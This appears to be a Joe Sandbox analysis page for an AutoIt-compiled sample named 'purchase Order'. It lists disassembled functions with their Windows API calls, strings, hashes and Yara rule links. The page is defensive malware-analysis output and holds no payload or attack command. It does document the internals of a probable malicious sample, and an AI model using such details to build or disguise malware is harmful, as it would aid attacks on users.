Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$@U=u$tooltips_class32
API String ID: 3877571568-1130792468
Opcode ID: e7dc5184997c5f731d9e3bb75bd7aeb525b85b30c3fb25c67a832a6c465b2cab
Instruction ID: e0332049e0ac4d59f22e7f7779af08e9d4db7201c4fe66ecda20ed8f7a2911e3
Opcode Fuzzy Hash: e7dc5184997c5f731d9e3bb75bd7aeb525b85b30c3fb25c67a832a6c465b2cab
Instruction Fuzzy Hash: 9971ACB4140306AFD720CF28CC85FAA77F5EB89708F44451DF996872A1DB75EA42DB22

Function 00CAF351 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

DragQueryPoint.SHELL32(?,?), ref: 00CAF37A

Part of subcall function 00CAD7DE: ClientToScreen.USER32(?,?), ref: 00CAD807
Part of subcall function 00CAD7DE: GetWindowRect.USER32(?,?), ref: 00CAD87D
Part of subcall function 00CAD7DE: PtInRect.USER32(?,?,00CAED5A), ref: 00CAD88D

SendMessageW.USER32(?,000000B0,?,?), ref: 00CAF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CAF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CAF411
_wcscat.LIBCMT ref: 00CAF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CAF458
SendMessageW.USER32(?,000000B0,?,?), ref: 00CAF471
SendMessageW.USER32(?,000000B1,?,?), ref: 00CAF488
SendMessageW.USER32(?,000000B1,?,?), ref: 00CAF4AA
DragFinish.SHELL32(?), ref: 00CAF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CAF59C

Strings

@GUI_DRAGID, xrefs: 00CAF510
@U=u, xrefs: 00CAF3E3, 00CAF458, 00CAF471, 00CAF488, 00CAF4AA
@GUI_DRAGFILE, xrefs: 00CAF54B
@GUI_DROPID, xrefs: 00CAF4D1

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 169749273-762882726
Opcode ID: 0ae03d5781d5d3e7a0e91a5f95a3adf4de047e749e2352b09dd7e28108af6b89
Instruction ID: 2c26071dd5e96b792b3fb5d6d636fdd4f327489497d48afe13b17d0898ebea27
Opcode Fuzzy Hash: 0ae03d5781d5d3e7a0e91a5f95a3adf4de047e749e2352b09dd7e28108af6b89
Instruction Fuzzy Hash: E9614B71108305AFC305EF64CC85E9FBBE8FF89714F400A2DF696921A1DB709A09DB52

Function 00C7D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C7D753

Strings

[CLASS:, xrefs: 00C7D7A3
LAST, xrefs: 00C7D718
[REGEXPTITLE:, xrefs: 00C7D77B
[ALL, xrefs: 00C7D7F9
[LAST, xrefs: 00C7D800
HANDLE=, xrefs: 00C7D74C
[ACTIVE, xrefs: 00C7D740
ALL, xrefs: 00C7D7E7
[HANDLE:, xrefs: 00C7D75F
CLASSNAME=, xrefs: 00C7D790
REGEXP=, xrefs: 00C7D768
ACTIVE, xrefs: 00C7D72E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 9ade74606ea2be699dff2106908e27183168b4e035fada99fdc2f3a7844b05e5
Instruction ID: 6efb0f0f1dadc816772d473c80b645321c7c51dda9314c007f7b96e28633bbb6
Opcode Fuzzy Hash: 9ade74606ea2be699dff2106908e27183168b4e035fada99fdc2f3a7844b05e5
Instruction Fuzzy Hash: 4C316D31644209ABDB68FA50DD83EEEB3B4AF20711F204139F957710E9EB61AF04E653

Function 00C979B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00C979C6
LoadCursorW.USER32(00000000,00007F00), ref: 00C979D1
LoadCursorW.USER32(00000000,00007F03), ref: 00C979DC
LoadCursorW.USER32(00000000,00007F8B), ref: 00C979E7
LoadCursorW.USER32(00000000,00007F01), ref: 00C979F2
LoadCursorW.USER32(00000000,00007F81), ref: 00C979FD
LoadCursorW.USER32(00000000,00007F88), ref: 00C97A08
LoadCursorW.USER32(00000000,00007F80), ref: 00C97A13
LoadCursorW.USER32(00000000,00007F86), ref: 00C97A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00C97A29
LoadCursorW.USER32(00000000,00007F85), ref: 00C97A34
LoadCursorW.USER32(00000000,00007F82), ref: 00C97A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00C97A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00C97A55
LoadCursorW.USER32(00000000,00007F02), ref: 00C97A60
LoadCursorW.USER32(00000000,00007F89), ref: 00C97A6B
GetCursorInfo.USER32(?), ref: 00C97A7B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 9f1ff22fd7f6fed05ac383b9c9a0ca2ec4fdff5b31fed1260f92a82c609b300e
Instruction ID: f61d6656a280badf3db6cced2e336e09ef94e3f94c1e5057c9fba2d429e661b5
Opcode Fuzzy Hash: 9f1ff22fd7f6fed05ac383b9c9a0ca2ec4fdff5b31fed1260f92a82c609b300e
Instruction Fuzzy Hash: 603136B0D0831A6ADF109FB68C8995FBFE8FF04750F50453AE50DE7280DA78A5008FA5

Function 00C4C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00C5E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C4C8B7,?,00002000,?,?,00000000,?,00C4419E,?,?,?,00CDDC00), ref: 00C5E984

Part of subcall function 00C4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C453B1,?,?,00C461FF,?,00000000,00000001,00000000), ref: 00C4662F

__wsplitpath.LIBCMT ref: 00C4C93E

Part of subcall function 00C61DFC: __wsplitpath_helper.LIBCMT ref: 00C61E3C

_wcscpy.LIBCMT ref: 00C4C953
_wcscat.LIBCMT ref: 00C4C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C4C978
SetCurrentDirectoryW.KERNEL32(?), ref: 00C4CABE

Part of subcall function 00C4B337: _wcscpy.LIBCMT ref: 00C4B36F

Strings

Error opening the file, xrefs: 00CB30B4, 00CB313D
Unterminated string, xrefs: 00CB3470
AU3!, xrefs: 00C4C90C
>>>AUTOIT SCRIPT<<<, xrefs: 00CB311B
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00CB3098
Bad directive syntax error, xrefs: 00CB3429
EA06, xrefs: 00CB30C9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 9201631ebb6ae38a03e1588b646a62b82dd1832df021b6c69043e449965ebff2
Instruction ID: c79f21ff4b654e3fee9bc34d04e4ff4c6d301a2dd6e04031f54b283eafb23057
Opcode Fuzzy Hash: 9201631ebb6ae38a03e1588b646a62b82dd1832df021b6c69043e449965ebff2
Instruction Fuzzy Hash: 49129E715083419FC724EF24C881AAFBBE5FF99304F44492EF59A93261DB30DA49EB52

Function 00CA716A Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CA71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA7247

Strings

GETTEXT, xrefs: 00CA7382
@U=u, xrefs: 00CA7247
GETTOTALCOUNT, xrefs: 00CA722A
COLLAPSE, xrefs: 00CA728D
UNCHECK, xrefs: 00CA740B
CHECK, xrefs: 00CA7267
SELECT, xrefs: 00CA73E0
EXISTS, xrefs: 00CA72B0
GETSELECTED, xrefs: 00CA733F
EXPAND, xrefs: 00CA72E1
ISCHECKED, xrefs: 00CA73B2
GETITEMCOUNT, xrefs: 00CA7311

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-383632319
Opcode ID: ea3bac4644b5946f7fae2d9d1f711dc25c82f2b3bbc4031d03523c19b6353d27
Instruction ID: e4e8a214ebcdb70fafca28233cbd8e784573706b21ec6ac812460a3233f91d43
Opcode Fuzzy Hash: ea3bac4644b5946f7fae2d9d1f711dc25c82f2b3bbc4031d03523c19b6353d27
Instruction Fuzzy Hash: 669172742047129BCB14EF10C891A6EB7A1BF95314F00895DFD965B3A3DB30EE4AEB85

Function 00CAE4F5 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CAE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CA9808,?), ref: 00CAE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CAE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CAE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CAE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00CA9808,?), ref: 00CAE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CAE6DF
DestroyIcon.USER32(?), ref: 00CAE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CAE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CAE717

Part of subcall function 00C60FA7: __wcsicmp_l.LIBCMT ref: 00C61030

Strings

.dll, xrefs: 00CAE564
.icl, xrefs: 00CAE521
@U=u, xrefs: 00CAE6F7
.exe, xrefs: 00CAE541

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl$@U=u
API String ID: 1212759294-1639919054
Opcode ID: c3c5bc36cdbe6e1c55d6c4d6b8da2a49dd805886566181e74b19ec69bd7906ae
Instruction ID: 94e8b75fe73f6ede9158367ef90fc138fbb046f7d4cb9c9e001bcc73212ead14
Opcode Fuzzy Hash: c3c5bc36cdbe6e1c55d6c4d6b8da2a49dd805886566181e74b19ec69bd7906ae
Instruction Fuzzy Hash: 8961D47150061AFBEB24DF64CC86FFE77A8BB15714F104515F915E60D1EB709A80D7A0

Function 00C8AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00C8AB3D
VariantCopy.OLEAUT32(?,?), ref: 00C8AB46
VariantClear.OLEAUT32(?), ref: 00C8AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C8AC40
__swprintf.LIBCMT ref: 00C8AC70
VarR8FromDec.OLEAUT32(?,?), ref: 00C8AC9C
VariantInit.OLEAUT32(?), ref: 00C8AD4D
SysFreeString.OLEAUT32(00000016), ref: 00C8ADDF
VariantClear.OLEAUT32(?), ref: 00C8AE35
VariantClear.OLEAUT32(?), ref: 00C8AE44
VariantInit.OLEAUT32(00000000), ref: 00C8AE80

Strings

Default, xrefs: 00C8ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 00C8AC6A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 0760bc842a86c585b334579433c15ef06e0a4253e608c96802ef56d9f715686f
Instruction ID: 9b374125bffaa9b862852cd8133155091ea8c788a7f63d7b3039d3383fe6c891
Opcode Fuzzy Hash: 0760bc842a86c585b334579433c15ef06e0a4253e608c96802ef56d9f715686f
Instruction Fuzzy Hash: FBD11331600205EBEB24BF66C884B7EB7B5FF04704F14846BE5159B190DB70ED50EBAA

Function 00C8D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

CharLowerBuffW.USER32(?,?), ref: 00C8D292
GetDriveTypeW.KERNEL32 ref: 00C8D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8D38C

Strings

set cd door , xrefs: 00C8D32D
open, xrefs: 00C8D2B9
open , xrefs: 00C8D2EE
type cdaudio alias cd wait, xrefs: 00C8D30A
close, xrefs: 00C8D298
closed, xrefs: 00C8D2A6, 00C8D2AF
wait, xrefs: 00C8D349
close cd wait, xrefs: 00C8D377

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 0322f039de5d06acef29d33e37aafe12e0c7482a1831c03964e2466bf1117094
Instruction ID: fdd77e73ca77ff2c453e16560a8f3412e942b1041a86ed8a28117285238d63b9
Opcode Fuzzy Hash: 0322f039de5d06acef29d33e37aafe12e0c7482a1831c03964e2466bf1117094
Instruction Fuzzy Hash: BE512871104645AFC700EF21C88196EB7F4FF99758F00486DF896A72A1DB31EE0ADB52

Function 00C826BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00CB3973,00000016,0000138C,00000016,?,00000016,00CDDDB4,00000000,?), ref: 00C826F1
LoadStringW.USER32(00000000,?,00CB3973,00000016), ref: 00C826FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00CB3973,00000016,0000138C,00000016,?,00000016,00CDDDB4,00000000,?,00000016), ref: 00C8271C
LoadStringW.USER32(00000000,?,00CB3973,00000016), ref: 00C8271F
__swprintf.LIBCMT ref: 00C8276F
__swprintf.LIBCMT ref: 00C82780
_wprintf.LIBCMT ref: 00C82829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C82840

Strings

Line %d:, xrefs: 00C8277A
%s (%d) : ==> %s: %s %s, xrefs: 00C82824
^ ERROR, xrefs: 00C827D5
Error: , xrefs: 00C827F7
Line %d (File "%s"):, xrefs: 00C82769

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: a8aa5af630cf5cb0710c7190f87f8a45515ea42af346ceb1d4d02c8522c374df
Instruction ID: 3072d838ac7e4fa373f1edcfcea61d9d234a9fe77c27b8d6bd1919a058653706
Opcode Fuzzy Hash: a8aa5af630cf5cb0710c7190f87f8a45515ea42af346ceb1d4d02c8522c374df
Instruction Fuzzy Hash: 13410E72800259BBCF14FBD0DD86EEEB778BF15344F100065B606760A2EA746F59EB61

Function 00C8D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C8D0D8
__swprintf.LIBCMT ref: 00C8D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C8D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C8D15C
_memset.LIBCMT ref: 00C8D17B
_wcsncpy.LIBCMT ref: 00C8D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C8D1EC
CloseHandle.KERNEL32(00000000), ref: 00C8D1F7
RemoveDirectoryW.KERNEL32(?), ref: 00C8D200
CloseHandle.KERNEL32(00000000), ref: 00C8D20A

Strings

\??\%s, xrefs: 00C8D0F4
:, xrefs: 00C8D11B
\, xrefs: 00C8D110

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 06ab2daf028fd51385445a758c2712179c7cecf167412e8f9dfeb48ada70f6f8
Instruction ID: a05f00bbed2109990b484601fc0a9b626b54720d54b364430460d5bb67d5d8ad
Opcode Fuzzy Hash: 06ab2daf028fd51385445a758c2712179c7cecf167412e8f9dfeb48ada70f6f8
Instruction Fuzzy Hash: 2D3192B2500109ABDB21EFA0DC49FEF77BDAF89744F1040B5F51AD21A0E7709B458B24

Function 00C905F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00C9076F
_wcscat.LIBCMT ref: 00C90787
_wcscat.LIBCMT ref: 00C90799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C907AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00C907C2
GetFileAttributesW.KERNEL32(?), ref: 00C907DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C907F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00C90806

Strings

*.*, xrefs: 00C90845

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 0c5093b2e6a9caa9199590dc10444c5e5507303fb67b1c605dedb9b324992533
Instruction ID: f0d034b4571a68cd021c64c2eba326e900a113c8490e8138d14ea00cf099d8b6
Opcode Fuzzy Hash: 0c5093b2e6a9caa9199590dc10444c5e5507303fb67b1c605dedb9b324992533
Instruction Fuzzy Hash: A98190716043419FCF24DF24C84996EB7E8BF89314F28882EF995D7251E730EA55CB92

Function 00CAEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CAEF3B
GetFocus.USER32 ref: 00CAEF4B
GetDlgCtrlID.USER32(00000000), ref: 00CAEF56
_memset.LIBCMT ref: 00CAF081
GetMenuItemInfoW.USER32 ref: 00CAF0AC
GetMenuItemCount.USER32(00000000), ref: 00CAF0CC
GetMenuItemID.USER32(?,00000000), ref: 00CAF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CAF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CAF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CAF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CAF1C8

Strings

0, xrefs: 00CAF079

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 8fcf8e1c67282833454651c14d1c17048a8d8be1ac7d0e0ebede9d4e8bd31a9a
Instruction ID: cafe822baee8a77d8cd79eaaf370a88f93ab9945de1c778edfe6d21cef0f36db
Opcode Fuzzy Hash: 8fcf8e1c67282833454651c14d1c17048a8d8be1ac7d0e0ebede9d4e8bd31a9a
Instruction Fuzzy Hash: 10817C71104302AFD720CF54CC84A6FBBE8FB89318F00492DFAA997291D771D906DBA2

Function 00C7A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C7ABD7
Part of subcall function 00C7ABBB: GetLastError.KERNEL32(?,00C7A69F,?,?,?), ref: 00C7ABE1
Part of subcall function 00C7ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00C7A69F,?,?,?), ref: 00C7ABF0
Part of subcall function 00C7ABBB: HeapAlloc.KERNEL32(00000000,?,00C7A69F,?,?,?), ref: 00C7ABF7
